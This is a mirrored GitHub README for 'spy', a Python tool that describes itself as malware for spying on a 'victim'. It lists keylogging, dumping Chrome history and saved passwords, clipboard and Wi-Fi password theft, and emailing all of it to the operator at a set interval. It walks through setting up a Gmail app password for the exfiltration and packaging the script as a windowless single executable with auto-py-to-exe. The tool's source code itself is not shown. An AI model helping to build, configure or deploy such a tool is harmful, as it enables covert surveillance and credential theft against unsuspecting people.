Giter Site home page Giter Site logo

spy's Introduction

DISCLAIMER

THIS TOOLS IS FOR EDUCATIONAL PURPOSES ONLY.

BE RESPONSABLE OF YOUR ACTIONS!

SPY

Spy is a Python project that does what the name suggests Spys on your victim.

  • Get the victim's machine infos

  • Stores the victim's key strokes

  • Dumps the victim's chrome history

  • Dumps the victim's chrome stored passwords

  • Get the victim's clipboard if existed

  • Get the victim's wifi connections list with corresponding passwords

  • Send all these informations to your email every 'n' seconds

Requirements

Use the package manager pip to install requirements.

pip3 install -r requirements.txt

Usage

Change these variables to adapt to your usage

addr = "[email protected]" 
#put your email adress here  
passwd = r"REDACTED"
# email password here 
dir_path = 'C:\\Users\\Public\\Logs\\'
#where the malware stores data
delay = 600 
# send an email every 600 seconds

Do not use your email password the SMTP library won't accept it

Go to your Google Account.

Select Security.

Alt text

Under "Signing in to Google," select App Passwords.

You may need to sign in. If you don’t have this option, it might be because:

Two-Factor Authentication is not set up for your account.
Two-Factor Authentication is only set up for security keys.
Your account is through work, school, or other organization.
You turned on Advanced Protection.

At the bottom, choose Select app and choose Mail and then Select Windows computer.

Alt text

Follow the instructions to enter the App Password.
The App Password is the 16-character code in the yellow bar on your device.

Copy Paste your Password and Run .

python3 spy.py

Or you can turn it to an executable using PyInstaller or Auto-Py-to-exe which i recommend

pip3 install auto-py-to-exe
auto-py-to-exe

Locate spy.py

Alt text

Check the One-file and the Window-based options

Start converting

RUN!!

Output

Alt text

License

MIT

spy's People

Contributors

saidabderrahmen avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar

Forkers

juanziito23

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.